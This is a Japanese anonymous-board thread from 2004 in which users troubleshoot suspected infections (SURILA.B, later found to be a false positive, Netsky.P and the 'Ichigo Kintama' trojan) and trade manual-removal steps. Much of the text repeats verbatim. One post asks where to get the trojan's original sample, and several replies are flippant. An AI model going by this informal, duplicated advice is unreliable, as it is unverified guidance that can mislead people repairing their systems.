541 :やちゃた:04/09/24 07:28:39
482のBKDR_SURILA.Bの持ち主です。みなさん、いろいろ情報
ありがとうございます。
>>460さん
見落として同じ事を聞いていました。すみません。
>>483さん
仕事でPC使うので死活問題。気にします。
>>484さん
いえ、そりゃ全部直したいですよ。でも方法はどこ壊れたか、
ここで聞けないから、まずウイルスのこと教えてくださいと
しました。
>>485さん
そうですね。それがベストだった気がします。あと1週間も
すればウイルスバスターも動いてくれるかな?
>>487さん
ありがとうございます。今もてる最高の情報でした。しか
しホストファイルは探し出せませんでした。オンラインはO
UTLOOK使ってくれということで最後までしてません。
>>その他の私と同じウイルスの持ち主さん、
忍耐?で、がんばりましょうね。
取りあえず、BKDR_SURILA.B は最新パターンで取り扱ってい
るのも外国の数社で、対抗策は見えず、わかりやすい日本版を
待つのがベターかと判断しました。
私は自分の壊してしまったところを修復していくのを優先す
ることにします。
ありがとうございます。
>>460さん
見落として同じ事を聞いていました。すみません。
>>483さん
仕事でPC使うので死活問題。気にします。
>>484さん
いえ、そりゃ全部直したいですよ。でも方法はどこ壊れたか、
ここで聞けないから、まずウイルスのこと教えてくださいと
しました。
>>485さん
そうですね。それがベストだった気がします。あと1週間も
すればウイルスバスターも動いてくれるかな?
>>487さん
ありがとうございます。今もてる最高の情報でした。しか
しホストファイルは探し出せませんでした。オンラインはO
UTLOOK使ってくれということで最後までしてません。
>>その他の私と同じウイルスの持ち主さん、
忍耐?で、がんばりましょうね。
取りあえず、BKDR_SURILA.B は最新パターンで取り扱ってい
るのも外国の数社で、対抗策は見えず、わかりやすい日本版を
待つのがベターかと判断しました。
私は自分の壊してしまったところを修復していくのを優先す
ることにします。
542 :名無しさん@お腹いっぱい。:04/09/24 09:34:41
【使用OS、WindowsUpdateの有無】Win2k,月に一回程度
【使用AntiVirus、Updateの有無】AVG,Norton体験版
【スキャンした結果(ウイルス名・発見場所)】なし
【症状】ネットワークが全く機能しない。同じネットワークのマシンすら見えない。
Z*******.tmpという実に怪しいファイルがtempフォルダに毎回起動時に生成される。*は毎回異なる。
【これまでにとった措置】spybot,ad-aware,AVG,Norton(Nortonは怪しいと思った瞬間にインスコしました)によるチェック済み。
おそらくなんかのトロイを食らっているような気がするのですが、
スキャンしても何も出てこないのが・・。
同じLANのなかの別のマシンからはこうして2chにも接続できるので、単なるLANの不良ではなさぽ。
ちなみに怪しい.tmpのファイルは「使用中の可能性が〜」とのことで削除もウイルスチェックもさせてもらえません。
どうかお知恵をお貸しください。
【使用AntiVirus、Updateの有無】AVG,Norton体験版
【スキャンした結果(ウイルス名・発見場所)】なし
【症状】ネットワークが全く機能しない。同じネットワークのマシンすら見えない。
Z*******.tmpという実に怪しいファイルがtempフォルダに毎回起動時に生成される。*は毎回異なる。
【これまでにとった措置】spybot,ad-aware,AVG,Norton(Nortonは怪しいと思った瞬間にインスコしました)によるチェック済み。
おそらくなんかのトロイを食らっているような気がするのですが、
スキャンしても何も出てこないのが・・。
同じLANのなかの別のマシンからはこうして2chにも接続できるので、単なるLANの不良ではなさぽ。
ちなみに怪しい.tmpのファイルは「使用中の可能性が〜」とのことで削除もウイルスチェックもさせてもらえません。
どうかお知恵をお貸しください。
ちなみに、ZoneAlarmのログを見ると、なんだかえらい頻度で通信をブロックしているようです。
今はネットワークそのものを無効にしているので何もありませんが・・。
今はネットワークそのものを無効にしているので何もありませんが・・。
544 :名無しさん@お腹いっぱい。:04/09/24 09:52:11
>>542-543
AVGとNorton体験版を同時に入れちゃだめ、Nortonはアンインストールしろ
他のソフトで並行してスキャンしたい時は、オンラインスキャンを使うべし
トロイを疑うのなら、アンチトロイソフトでも入れてスキャンしてみろ
【フリー版】トロイ対策 a scuared 2【あり】
http://pc5.2ch.net/test/read.cgi/sec/1077204396/
セーフモードでウィルススキャンすれば、「使用中の可能性が〜」のものは駆除できる
AVGとNorton体験版を同時に入れちゃだめ、Nortonはアンインストールしろ
他のソフトで並行してスキャンしたい時は、オンラインスキャンを使うべし
トロイを疑うのなら、アンチトロイソフトでも入れてスキャンしてみろ
【フリー版】トロイ対策 a scuared 2【あり】
http://pc5.2ch.net/test/read.cgi/sec/1077204396/
セーフモードでウィルススキャンすれば、「使用中の可能性が〜」のものは駆除できる
【使用OS、WindowsUpdateの有無】Win2k,月に一回程度
Windows2000なら、自動的に「重要な更新」をダウンロードしてインストールする設定にできるはず
WindowsUpdateはくまなくやって、その設定をしておけ。月に1回じゃ少なすぎ
Windows2000なら、自動的に「重要な更新」をダウンロードしてインストールする設定にできるはず
WindowsUpdateはくまなくやって、その設定をしておけ。月に1回じゃ少なすぎ
546 :名無しさん@お腹いっぱい。:04/09/24 09:56:13
苺キンタマに引っかかった奴って炉愛好者なんでしょ?
547 :名無しさん@お腹いっぱい。:04/09/24 10:15:30
>>542
ZA入れてからちゃんとできてた?
ZAが邪魔しているということはありえませんか?
そうすれば頻繁に通信をブロックしているということも説明できる。
んでそのファイルがブロックのログということは?
ZA入れてからちゃんとできてた?
ZAが邪魔しているということはありえませんか?
そうすれば頻繁に通信をブロックしているということも説明できる。
んでそのファイルがブロックのログということは?
548 :名無しさん@お腹いっぱい。:04/09/24 10:52:22
すいません、メールを送ってないのにノートンにメールが送れませんでしたと出てくるのですが・・・
アドレスはいつも一緒の所に送られているようで・・・
アドレスはいつも一緒の所に送られているようで・・・
>>541
VB2004で隔離した(検出した)ファイルはsvkp.sys以外にも
あるんでないの?
(たとえば、dx32cxlp.exe/dx32cxel.sys/dx32cxconf.ini)
SURILA.Bは別ワームMydoom.ほげほげがダウンするものらしい
そしてMydoom.ほげほげは亜種がたくさんあって、チミの情報
だけじゃ絞り込めぬ。
(pandaにもその旨書いてあるんだが本当に対応しきれてるのか
が疑問に思えてきた)
上の情報があれば絞り込みができるかもしれない。
(回答できるとしても早くて夜以降になるけど)
隔離してるからほおっておいても実害はないと思うけど気になるなら
書いてみるとよろし。
ちなみにhostsファイル(hostはtypo)は
95/98/ME: C:\Windows\System フォルダ
NT/2000: C:\WinNT\System32\Drivers\ETC フォルダ,
XP: C:\Windows\System32\Drivers\ETC フォルダ
でメモ帳なんかで確認できる
でふぉではエントリとしてコメント行(#で始まる)以外に
127.0.0.1 localhost
がある
このファイルだけなおしても意味ないけどね
手動削除手順は以下のような感じになると思う(スペイン語)
ttp://www.softdownload.org/fichas/masbuscados/virusreport/guias_de_seguridad/trojsurila.naa.2._3166.asp
VB2004で隔離した(検出した)ファイルはsvkp.sys以外にも
あるんでないの?
(たとえば、dx32cxlp.exe/dx32cxel.sys/dx32cxconf.ini)
SURILA.Bは別ワームMydoom.ほげほげがダウンするものらしい
そしてMydoom.ほげほげは亜種がたくさんあって、チミの情報
だけじゃ絞り込めぬ。
(pandaにもその旨書いてあるんだが本当に対応しきれてるのか
が疑問に思えてきた)
上の情報があれば絞り込みができるかもしれない。
(回答できるとしても早くて夜以降になるけど)
隔離してるからほおっておいても実害はないと思うけど気になるなら
書いてみるとよろし。
ちなみにhostsファイル(hostはtypo)は
95/98/ME: C:\Windows\System フォルダ
NT/2000: C:\WinNT\System32\Drivers\ETC フォルダ,
XP: C:\Windows\System32\Drivers\ETC フォルダ
でメモ帳なんかで確認できる
でふぉではエントリとしてコメント行(#で始まる)以外に
127.0.0.1 localhost
がある
このファイルだけなおしても意味ないけどね
手動削除手順は以下のような感じになると思う(スペイン語)
ttp://www.softdownload.org/fichas/masbuscados/virusreport/guias_de_seguridad/trojsurila.naa.2._3166.asp
550 :W32.Netsky.P@mm:04/09/24 13:17:07
Return-Path: <[email protected]>
Received:from ttb2-ip008.user.xsp.fenics.jp (EHLO yahoo.co.jp) (219.97.237.8)
by **
From: [email protected]
To: **
Subject: Thank you!
Date: **
MIME-Version:1.0 Content-Type:multipart/mixed;
X-Priority:3 X-MSMail-Priority:Normal
Your bill is attached to this mail.
ファイル名: bill.zip
ファイルの種類: application/octet-stream
スキャン結果: W32.Netsky.P@mmというウイルスが見つかりました。
Received:from ttb2-ip008.user.xsp.fenics.jp (EHLO yahoo.co.jp) (219.97.237.8)
by **
From: [email protected]
To: **
Subject: Thank you!
Date: **
MIME-Version:1.0 Content-Type:multipart/mixed;
X-Priority:3 X-MSMail-Priority:Normal
Your bill is attached to this mail.
ファイル名: bill.zip
ファイルの種類: application/octet-stream
スキャン結果: W32.Netsky.P@mmというウイルスが見つかりました。
551 :W32.Netsky.P@mm:04/09/24 13:17:34
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
より、
差出人:[email protected]
件名:
Congratulations!
Thank you!
本文:
You were registered to the pay system.
For more details see the attachment.
Your bill is attached to this mail.
より、
差出人:[email protected]
件名:
Congratulations!
Thank you!
本文:
You were registered to the pay system.
For more details see the attachment.
Your bill is attached to this mail.
552 :W32.Netsky.P@mm:04/09/24 13:18:07
W32.Netsky.P@mm!enc に感染しているファイルが検出された場合、
そのファイルには、MIME 形式でエンコードされたW32.Netsky.P@mm ワーム
が含まれています。
http://www.symantec.com/region/jp/sarcj/data/w/w32.netsky.p@mm!enc.html
末尾に.encが付いた検出名が通知される場合の対処方法
http://www.symantec.com/region/jp/sarcj/data/e/enc.detection.html
そのファイルには、MIME 形式でエンコードされたW32.Netsky.P@mm ワーム
が含まれています。
http://www.symantec.com/region/jp/sarcj/data/w/w32.netsky.p@mm!enc.html
末尾に.encが付いた検出名が通知される場合の対処方法
http://www.symantec.com/region/jp/sarcj/data/e/enc.detection.html
542です。出先からなので今すぐというわけにいきませんが、
自宅に帰ったら試してみたいと思います。よろしくお願いいたします。
結果は後ほど報告させていただきます。
>>544氏
もともとは併用ではなかったのです。
少しずつパフォーマンスが低下しているネットワークに異変を感じて
シマンテックのオンラインスキャンを試していたら、そのうちにネットワークが完全に死亡。
AVGでスキャンしても異常なし。
シマンテックのスキャンの途中経過に感染ファイルがいくつかピックアップされていたので
これではいけない、と別マシンで体験版をDLし、死亡機にインスコ。
感染ファイル発見→削除→直んねぇ・・・。
という経緯だったのです。
重要な更新はDLしてインスコする設定になっていました。
そのほかに月に一回、ということです。
書き方が悪かったですね、もうしわけありません。
セーフモードでのスキャン、アンチトロイ、試してみます。ありがとうございます。
>>547氏
ZAは以前より導入していましたし、試しにZAを終了させても事態が変わらなかったので
おそらくZAは原因ではないと思います。
ただ、一分おきにincomingに対してブロックしているという状況は
いささか異常なのではないかと思って書き添えました。
ファイルは(出先なので記憶があいまいですが)256バイトだったように思います。ログにしては小さいです。
ともあれ、ありがとうございます。
自宅に帰ったら試してみたいと思います。よろしくお願いいたします。
結果は後ほど報告させていただきます。
>>544氏
もともとは併用ではなかったのです。
少しずつパフォーマンスが低下しているネットワークに異変を感じて
シマンテックのオンラインスキャンを試していたら、そのうちにネットワークが完全に死亡。
AVGでスキャンしても異常なし。
シマンテックのスキャンの途中経過に感染ファイルがいくつかピックアップされていたので
これではいけない、と別マシンで体験版をDLし、死亡機にインスコ。
感染ファイル発見→削除→直んねぇ・・・。
という経緯だったのです。
重要な更新はDLしてインスコする設定になっていました。
そのほかに月に一回、ということです。
書き方が悪かったですね、もうしわけありません。
セーフモードでのスキャン、アンチトロイ、試してみます。ありがとうございます。
>>547氏
ZAは以前より導入していましたし、試しにZAを終了させても事態が変わらなかったので
おそらくZAは原因ではないと思います。
ただ、一分おきにincomingに対してブロックしているという状況は
いささか異常なのではないかと思って書き添えました。
ファイルは(出先なので記憶があいまいですが)256バイトだったように思います。ログにしては小さいです。
ともあれ、ありがとうございます。
554 :名無しさん@お腹いっぱい。:04/09/24 16:43:21
質問します。
w2kで、あるソフトを起動、うまく動かないので、再起動。
英語のメッセージが出てエラー。
ファイルだけでも救出しようと、もう1台のパソコンにその起動HDDを接続し
起動させると、そのパソコンの「ページファイルがありません・・・」で動かず
そのHDをはずしても、そのパソコンまでまともに動かない。
接続、データードライブとして起動しただけで、感染するウイルスってあるのですか?
また、その対策は!?(他人のパソコンまでまきぞいにしてしまい、悲しいです・・・)
m(_ _)m
w2kで、あるソフトを起動、うまく動かないので、再起動。
英語のメッセージが出てエラー。
ファイルだけでも救出しようと、もう1台のパソコンにその起動HDDを接続し
起動させると、そのパソコンの「ページファイルがありません・・・」で動かず
そのHDをはずしても、そのパソコンまでまともに動かない。
接続、データードライブとして起動しただけで、感染するウイルスってあるのですか?
また、その対策は!?(他人のパソコンまでまきぞいにしてしまい、悲しいです・・・)
m(_ _)m
555 :名無しさん@お腹いっぱい。:04/09/24 16:46:58
WindowsMeを使っています。
急に再起動を繰り返し困っています
ウイルスだと思うのですが何かわかりません。
駆除方法はないのでしょうか?
どなたか助けて下さい・・・
急に再起動を繰り返し困っています
ウイルスだと思うのですが何かわかりません。
駆除方法はないのでしょうか?
どなたか助けて下さい・・・
556 :名無しさん@お腹いっぱい。:04/09/24 17:05:03
>>555
>WindowsMeを使っています。
捨てろ。
>急に再起動を繰り返し困っています
へぇ〜
>ウイルスだと思うのですが何かわかりません。
アンチウィルスソフト使えよ。
>駆除方法はないのでしょうか?
何を駆除するんだよ。
>どなたか助けて下さい・・・
そりゃ無理だって。
エスパーさん出番ですよ!
>WindowsMeを使っています。
捨てろ。
>急に再起動を繰り返し困っています
へぇ〜
>ウイルスだと思うのですが何かわかりません。
アンチウィルスソフト使えよ。
>駆除方法はないのでしょうか?
何を駆除するんだよ。
>どなたか助けて下さい・・・
そりゃ無理だって。
エスパーさん出番ですよ!
ウイルス駆除ソフトは入れていました。
大切なものが入っているので再インスト−ルはどうしても避けたいです・・・
もうどうしたら良いのかわかりません
大切なものが入っているので再インスト−ルはどうしても避けたいです・・・
もうどうしたら良いのかわかりません
今となっては遅いのですが
バックアップとっていませんでした
バックアップとっていませんでした
559 :名無しさん@お腹いっぱい。:04/09/24 18:29:39
>>555
再インストール
再インストール
>>553
元々併用じゃなかろうが、今の時点で併用してちゃダメなの。
どうしてもノートンでスキャンしたいなら、オンラインスキャン使え。
>>554-555
どんなメッセージが出るのかもわからないし、もしかしてBIOSがぶっ壊れたんじゃねーのか?
ウィルス駆除ソフトは何いれてたかもわからないし、リカバリしろとしか言いようが無い
もっときちんと症状を書け
元々併用じゃなかろうが、今の時点で併用してちゃダメなの。
どうしてもノートンでスキャンしたいなら、オンラインスキャン使え。
>>554-555
どんなメッセージが出るのかもわからないし、もしかしてBIOSがぶっ壊れたんじゃねーのか?
ウィルス駆除ソフトは何いれてたかもわからないし、リカバリしろとしか言いようが無い
もっときちんと症状を書け
561 :名無しさん@お腹いっぱい。:04/09/24 18:32:54
方法1 デスクトップ型等ハードディスクが二台つけれるPCの場合
感染したHDDを取り外す
もう一台HDDを買って取り付けシステム再インストール&アンチウィルスソフト導入
感染したHDDをスレーブとして取り付ける
ウィルス駆除
方法2 ノートPC等のハードディスクが二台つけれないがLANが使えるPCで
なおかつもう一台LANが使えるPCがある場合
FD-Sambaを入れたフロッピーディスクを作る(作り方はFD-SambaでGoogle)
感染したPCをFD-Sambaを入れたフロッピーディスクで起動
感染したPCもう一台のPCとLANで接続
大切なデータをコピー
方法3 CD起動が出来るPCである
ttp://www.jtc-i.co.jp/avast/avast10-bart.htm
avast! BARD CD(アバスト バートCD 七万二千円)を購入してウィルスを駆除する
ttp://www.jtc-i.co.jp/avast/avast00-top.htm
感染したHDDを取り外す
もう一台HDDを買って取り付けシステム再インストール&アンチウィルスソフト導入
感染したHDDをスレーブとして取り付ける
ウィルス駆除
方法2 ノートPC等のハードディスクが二台つけれないがLANが使えるPCで
なおかつもう一台LANが使えるPCがある場合
FD-Sambaを入れたフロッピーディスクを作る(作り方はFD-SambaでGoogle)
感染したPCをFD-Sambaを入れたフロッピーディスクで起動
感染したPCもう一台のPCとLANで接続
大切なデータをコピー
方法3 CD起動が出来るPCである
ttp://www.jtc-i.co.jp/avast/avast10-bart.htm
avast! BARD CD(アバスト バートCD 七万二千円)を購入してウィルスを駆除する
ttp://www.jtc-i.co.jp/avast/avast00-top.htm
560さんへ
ありがとうございます。
初心者なので何がなんなのかわかりません。すみません。
わかったら報告します。
561さんへ
ありがとうございます。試してみます!!
563 :名無しさん@お腹いっぱい。:04/09/24 21:14:06
ユーザー名の完全な変更の仕方教えてください
WINXPです
WINXPです
564 :名無しさん@お腹いっぱい。:04/09/24 21:18:17
>>563
再インストール
再インストール
565 :名無しさん@お腹いっぱい。:04/09/24 21:19:25
画面に全体に急に血飛沫が出てきたんですけど、これってウイルス?
566 :名無しさん@お腹いっぱい。:04/09/24 21:22:19
567 :名無しさん@お腹いっぱい。:04/09/24 21:27:12
568 :名無しさん@お腹いっぱい。:04/09/24 22:05:53
>>482
俺も最新アップデート後、全検索したらSVKP.sysにBKDR_SURILA.Bが検出された。
しかし、不自然なのは検出ファイルがSVKP.sysしかないことだ。
SVKP.sysをコピーする他のウイルスの解説を読んでも、SVKP.sys自体はAntiCrackingが
提供するSVK Protectorの正規コンポーネントで、害の無いプログラムも利用しているとあり
ファイルサイズも同じだった。
また居昇殿起動時にリアルタイム検索に反応すること、SVKP.sysの更新日時は居昇殿を
インストールしたときと重なることから、居昇殿がソフトウェア保護のためにSVKPサービス
を利用しているだけで、今回は誤検出であると俺は予想というか期待している。
一応TrendMicroにウイルス検体としてSVKP.sysを送り返事を待っているところだ。
1営業日経過したが返事はこない。返事は来週になりそうだ。
俺も最新アップデート後、全検索したらSVKP.sysにBKDR_SURILA.Bが検出された。
しかし、不自然なのは検出ファイルがSVKP.sysしかないことだ。
SVKP.sysをコピーする他のウイルスの解説を読んでも、SVKP.sys自体はAntiCrackingが
提供するSVK Protectorの正規コンポーネントで、害の無いプログラムも利用しているとあり
ファイルサイズも同じだった。
また居昇殿起動時にリアルタイム検索に反応すること、SVKP.sysの更新日時は居昇殿を
インストールしたときと重なることから、居昇殿がソフトウェア保護のためにSVKPサービス
を利用しているだけで、今回は誤検出であると俺は予想というか期待している。
一応TrendMicroにウイルス検体としてSVKP.sysを送り返事を待っているところだ。
1営業日経過したが返事はこない。返事は来週になりそうだ。
569 :名無しさん@お腹いっぱい。:04/09/24 22:10:39
ttp://www.gamania.co.jp/kd/news/news_mainte_detail.asp?newsid=624
居昇殿の公式サイトに載ってた。やはり無問題っぽい。
今のところSVKP.sysの隔離を解除し、リアルタイム検索でSVKP.sysを検索対象外に登録
することで問題なく動作している。
居昇殿の公式サイトに載ってた。やはり無問題っぽい。
今のところSVKP.sysの隔離を解除し、リアルタイム検索でSVKP.sysを検索対象外に登録
することで問題なく動作している。
571 :名無しさん@お腹いっぱい。:04/09/24 23:59:41
正しくは巨商伝か。どーりでみつからん訳だ。
572 :名無しさん@お腹いっぱい。:04/09/25 00:15:27
自分は巨匠伝も、TWもまったく触れてないのにSURILA.Bに感染してました・・・
なにをしているトロイなのか分からずとても不安なので、解説出るまで回線つなげない事にします。
来週には駆除できるといいなぁ
なにをしているトロイなのか分からずとても不安なので、解説出るまで回線つなげない事にします。
来週には駆除できるといいなぁ
573 :名無しさん@お腹いっぱい。:04/09/25 00:36:18
shellsystem.exe発見したんですが削除できません
教えてくれませんか?
教えてくれませんか?
574 :名無しさん@お腹いっぱい。:04/09/25 00:38:08
>>573
[対処法]
(1)マイコンピュータを開き、Cドライブ→WINDOWSフォルダを開く
(2)検索ボタンを押してファイルとフォルダすべてからshellsystem.exeを検索
(3)検索結果に引っかかったならば削除
(4)スタートメニューの[ファイル名を指定して実行]を選びregeditと入力
(5)HKEY_USERS → .Default → Software → Microsoft
→ Windows → CurrentVersion → Run
と選んでいく
(6)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除
(7)HKEY_CURRENT_USER → Software → Microsoft
→ Windows → CurrentVersion → Run
と選んでいく
(8)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除
[情報]
追加されるファイル:
windows\shellsystem.exe 678kB
追加されるレジストリ:
HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
[対処法]
(1)マイコンピュータを開き、Cドライブ→WINDOWSフォルダを開く
(2)検索ボタンを押してファイルとフォルダすべてからshellsystem.exeを検索
(3)検索結果に引っかかったならば削除
(4)スタートメニューの[ファイル名を指定して実行]を選びregeditと入力
(5)HKEY_USERS → .Default → Software → Microsoft
→ Windows → CurrentVersion → Run
と選んでいく
(6)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除
(7)HKEY_CURRENT_USER → Software → Microsoft
→ Windows → CurrentVersion → Run
と選んでいく
(8)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除
[情報]
追加されるファイル:
windows\shellsystem.exe 678kB
追加されるレジストリ:
HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
575 :名無しさん@お腹いっぱい。:04/09/25 00:40:29
>>574をセーフモードで行う。
576 :名無しさん@お腹いっぱい。:04/09/25 00:47:40
すいません
セーフモードってどうやってやるんですか?
全然わからないのです
セーフモードってどうやってやるんですか?
全然わからないのです
577 :名無しさん@お腹いっぱい。:04/09/25 00:49:13
>>576
OSは?
OSは?
578 :名無しさん@お腹いっぱい。:04/09/25 00:52:07
XPです
579 :名無しさん@お腹いっぱい。:04/09/25 00:53:14
>>578
PC再起動時にF8連打
PC再起動時にF8連打
580 :名無しさん@お腹いっぱい。:04/09/25 00:55:13
わかりました
やってみます
再起動のときずっと連打してればいいんですか?
やってみます
再起動のときずっと連打してればいいんですか?
581 :名無しさん@お腹いっぱい。:04/09/25 00:57:48
>>580
そうそう。
そうそう。
582 :名無しさん@お腹いっぱい。:04/09/25 00:58:52
ありがとうございました
もしできなければよろしくお願いします;
もしできなければよろしくお願いします;
583 :名無しさん@お腹いっぱい。:04/09/25 01:19:50
ほんっとごめんなさいなんですけど
(6)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除
はrunの中にあるのでしょうか
それがないんですけど・・・
(6)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除
はrunの中にあるのでしょうか
それがないんですけど・・・
584 :名無しさん@お腹いっぱい。:04/09/25 01:41:43
585 :名無しさん@お腹いっぱい。:04/09/25 01:47:40
>>584
あぁ、Runにあったんだ。まずは良かった。
あぁ、Runにあったんだ。まずは良かった。
586 :名無しさん@お腹いっぱい。:04/09/25 01:54:35
とりあえずID出ない板では名前に番号でも入れて誰だか区別できるようにしようね
587 :名無しさん@お腹いっぱい。:04/09/25 01:58:06
苺の元種ってどっかで手に入らないかなぁ
588 :名無しさん@お腹いっぱい。:04/09/25 03:26:04
>>574さん
(5)のやり方で、「Run」の中に「ctfmon.exe(REG_SZ)」がありました。
これは削除すべきですか?
(7)の「Windows」の中に「Shell」と「ShellNoroam」があるのですが、
これはshellsystemと関連があるのでしょうか?削除すべきですか?
また、(7)の「current version」の中に「Shell Extensions」があるのですが、
これもshellsystemと関連があるのでしょうか?削除すべきですか?
ちなみに、(5)(7)の「Run」の中には「shellsystem.exe」のファイルはありません。
タスクマネージャーの中でそのファイルが機能していないので、
問題はないかと思いますが、少し不安です。
(5)のやり方で、「Run」の中に「ctfmon.exe(REG_SZ)」がありました。
これは削除すべきですか?
(7)の「Windows」の中に「Shell」と「ShellNoroam」があるのですが、
これはshellsystemと関連があるのでしょうか?削除すべきですか?
また、(7)の「current version」の中に「Shell Extensions」があるのですが、
これもshellsystemと関連があるのでしょうか?削除すべきですか?
ちなみに、(5)(7)の「Run」の中には「shellsystem.exe」のファイルはありません。
タスクマネージャーの中でそのファイルが機能していないので、
問題はないかと思いますが、少し不安です。
589 :名無しさん@お腹いっぱい。:04/09/25 03:30:56
>>588ですが、ちょい訂正。
shellsystem.exeを削除したので、
タスクマネージャーの中にはなく、処理速度は通常に戻っています。
なので、問題はないかと思いますが、少し不安です。
ちなみに、「HijackThis」で「shellsystem」の部分は削除しました。
shellsystem.exeを削除したので、
タスクマネージャーの中にはなく、処理速度は通常に戻っています。
なので、問題はないかと思いますが、少し不安です。
ちなみに、「HijackThis」で「shellsystem」の部分は削除しました。
590 :名無しさん@お腹いっぱい。:04/09/25 03:51:34
質問しまくりだな
少しは自分で調べようとする気はないのか?
てゆうか、おまい誰よ?
少しは自分で調べようとする気はないのか?
てゆうか、おまい誰よ?
591 :名無しさん@お腹いっぱい。:04/09/25 04:00:47
592 :やちゃた:04/09/25 06:35:37
みなさん、ご迷惑おかけしました。541のBKDR_SURILA.Bの件のものです。
私の結論は判明しました。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_SURILA.B&VSect=T
まったくの一人芝居みたいになり、皆を巻き込み恥ずかしい限りです。
>>549
ほんと、希少な情報を色々調べてもらいありがとうございました。
>>568 >>570
その通りでした。
>>569
欲張ってあれこれ聞いては、皆の迷惑と思って^^;;しかし、今にな
ってはシステムの回復が最大ネックです。がんばります。
>>572
いきさつは、私程度にはわかりませんが、がんばってください。
ということで、とあるゲームのプログラム中に不正でなく使われただけ
で、私が勘違いしてレジストリいじりまくったのがまずかっただけにな
りました。現在、M社オフィスのインストローラーが働かない、メールが
送信できない、起動が少し遅いが(一応ウイルスはないようです)が
課題になりました。これはスレ違いなので、ここでのアドヴァイスは
遠慮しますね。(ヒントもいただきました)皆さん本当にありがとうござ
いました。
私の結論は判明しました。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_SURILA.B&VSect=T
まったくの一人芝居みたいになり、皆を巻き込み恥ずかしい限りです。
>>549
ほんと、希少な情報を色々調べてもらいありがとうございました。
>>568 >>570
その通りでした。
>>569
欲張ってあれこれ聞いては、皆の迷惑と思って^^;;しかし、今にな
ってはシステムの回復が最大ネックです。がんばります。
>>572
いきさつは、私程度にはわかりませんが、がんばってください。
ということで、とあるゲームのプログラム中に不正でなく使われただけ
で、私が勘違いしてレジストリいじりまくったのがまずかっただけにな
りました。現在、M社オフィスのインストローラーが働かない、メールが
送信できない、起動が少し遅いが(一応ウイルスはないようです)が
課題になりました。これはスレ違いなので、ここでのアドヴァイスは
遠慮しますね。(ヒントもいただきました)皆さん本当にありがとうござ
いました。
593 :名無しさん@お腹いっぱい。:04/09/25 08:06:35
LiveUpdateでUpchan来てる?
そろそろ来ないと被害者数が凄いことになりそうなんだが
そろそろ来ないと被害者数が凄いことになりそうなんだが
594 :名無しさん@お腹いっぱい。:04/09/25 10:15:02
>>593
LiveUpdateでの対応は9月29日(水)予定らしい。
すぐに対応したい場合は下のサイトからなら初期のUpchanのみ対応できる。
亜種のcontig.txt.......exeなどは対応してないようだ。
Security Response
http://www.symantec.com/region/jp/sarcj/download/jp/JP-N95.html
LiveUpdateでの対応は9月29日(水)予定らしい。
すぐに対応したい場合は下のサイトからなら初期のUpchanのみ対応できる。
亜種のcontig.txt.......exeなどは対応してないようだ。
Security Response
http://www.symantec.com/region/jp/sarcj/download/jp/JP-N95.html
595 :名無しさん@お腹いっぱい。:04/09/25 16:49:21
>>589
HijackThisで消してるじゃん
HijackThisで消してるじゃん
596 :名無しさん@お腹いっぱい。:04/09/25 18:25:46
すいませんSURILA.B関連の話なのですが、、、
このスレッドを読んで、SURILAを駆除しようとpandaのオンラインスキャンをしたんです。
それから>>505、>>513を読んで驚いてしましました。
この話は本当で、だとしたらpandaからもらったウイルスはどう駆除できるのでしょうか?
トレンドマイクロオンラインスキャンをしてみたら検出はされなかったのですが。
このスレッドを読んで、SURILAを駆除しようとpandaのオンラインスキャンをしたんです。
それから>>505、>>513を読んで驚いてしましました。
この話は本当で、だとしたらpandaからもらったウイルスはどう駆除できるのでしょうか?
トレンドマイクロオンラインスキャンをしてみたら検出はされなかったのですが。
597 :名無しさん@お腹いっぱい。:04/09/25 23:07:01
ちょっと質問よいだろうか紳士諸兄。
最近巷で噂の苺きんたま。
気になったので一応自分のPCも調べてみて
全ファイル検索とタスクマネージャでは
sugoimonoss.comもshellsystem.exeもみつからなかったのだが
レジストリエディエタを検索してみたら
search Assistantというところに
種類 REG_SZ データ shellsystem.exeというのが出てきたので…
これは一体…?
あと、念のためこのトロイが潜むのはc:\windows直下ということで間違ってない?
最近巷で噂の苺きんたま。
気になったので一応自分のPCも調べてみて
全ファイル検索とタスクマネージャでは
sugoimonoss.comもshellsystem.exeもみつからなかったのだが
レジストリエディエタを検索してみたら
search Assistantというところに
種類 REG_SZ データ shellsystem.exeというのが出てきたので…
これは一体…?
あと、念のためこのトロイが潜むのはc:\windows直下ということで間違ってない?
598 :名無しさん@お腹いっぱい。:04/09/25 23:24:23
>>597
OS再インストすれば、消えるよ(*^ー゚)b
OS再インストすれば、消えるよ(*^ー゚)b
599 :名無しさん@お腹いっぱい。:04/09/25 23:31:20
500 名前:名無しさん@お腹いっぱい。[sage] 投稿日:04/09/25(土) 21:41:05 ID:HKA4Ue+e
C:\WINDOWS\〜でファイルの参照したら
$NtUninstallKB821557$
$NtUninstallQ810565$
$NtUninstallKB839643-DirectX9$
こんなのが青字でいっぱい出てきたんだけど何?
(((( ;゚Д゚)))ガクガクブルブル
つー質問があって、レスにそれウイルスの残すファイルだ〜ってあったんだが
本当?
$NtUninstallKB839643-DirectX9$があってさ、でもこれDirectX9入れたせいだと思うんだが・・
それにWindows Update 後にできるフォルダじゃなかったっけ?
もしかして俺釣られた?
C:\WINDOWS\〜でファイルの参照したら
$NtUninstallKB821557$
$NtUninstallQ810565$
$NtUninstallKB839643-DirectX9$
こんなのが青字でいっぱい出てきたんだけど何?
(((( ;゚Д゚)))ガクガクブルブル
つー質問があって、レスにそれウイルスの残すファイルだ〜ってあったんだが
本当?
